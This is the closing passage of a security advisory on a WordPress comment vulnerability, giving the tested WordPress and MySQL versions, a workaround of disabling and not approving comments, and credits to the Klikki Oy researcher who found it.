This was tested on WordPress 4.2, 4.1.2, and 4.1.1, MySQL versions 5.1.53
and 5.5.41.
 
 
*Solution*
Disable comments (Dashboard, Settings/Discussion, select as restrictive
options as possible). Do not approve any comments.
 
 
*Credits*
The vulnerability was discovered by Jouko Pynnönen of Klikki Oy.
 
An up-to-date version of this document: http://klikki.fi/adv/wordpress2.html
 
-- 
Jouko Pynnönen <jouko@iki.fi>
Klikki Oy - http://klikki.fi - @klikkioy

(119)